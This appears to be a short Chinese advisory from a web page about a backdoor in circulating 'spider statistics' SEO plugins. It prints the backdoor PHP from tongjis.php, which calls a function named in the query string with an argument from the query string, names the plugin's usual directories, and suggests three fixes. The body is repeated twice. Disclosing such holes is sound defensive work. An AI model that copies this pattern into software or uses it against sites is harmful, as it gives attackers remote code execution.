关于市面蜘蛛统计插件后门的解决方法
时间:2024年04月17日
编辑:佚名
这个也是今天才听说 市面流传的蜘蛛统计插件有后门这个事情(界面类似于小旋风),所以小编也给大家三个解决的办法!
//接收前端3个图表展示点击的异步地址
$req=$_SERVER[QUERY_STRING];
//进行切割调用函数:a() ,b() ,c()和相关的参数 具体可以在这里加入print_r($req);exit;然后前端点击3个图表
(我把它区分为a b c三个区域)的F12查看
$req=explode("",$req);
echo $req[0]($req[1]);
解决办法:
1:对方是通过tongjis.php来完成的入侵,但是需要tongjis.php 的位置目录,市面流传的固定目录(也就是放蜘蛛统计插件的目录)好像是tongji或者zhizhu或者zz,
所以改一下目录名字就可以了,不过此方法不适用于插件被人加了统计代码的(也就是你怎么改目录名,js统计代码一执行,就知道你的目录名)
2:修改tongjis.php漏洞代码
3:服务器加个防火墙
//接收前端3个图表展示点击的异步地址
$req=$_SERVER[QUERY_STRING];
//进行切割调用函数:a() ,b() ,c()和相关的参数 具体可以在这里加入print_r($req);exit;然后前端点击3个图表
(我把它区分为a b c三个区域)的F12查看
$req=explode("",$req);
echo $req[0]($req[1]);
解决办法:
1:对方是通过tongjis.php来完成的入侵,但是需要tongjis.php 的位置目录,市面流传的固定目录(也就是放蜘蛛统计插件的目录)好像是tongji或者zhizhu或者zz,
所以改一下目录名字就可以了,不过此方法不适用于插件被人加了统计代码的(也就是你怎么改目录名,js统计代码一执行,就知道你的目录名)
2:修改tongjis.php漏洞代码
3:服务器加个防火墙
相关文章
猜你需要
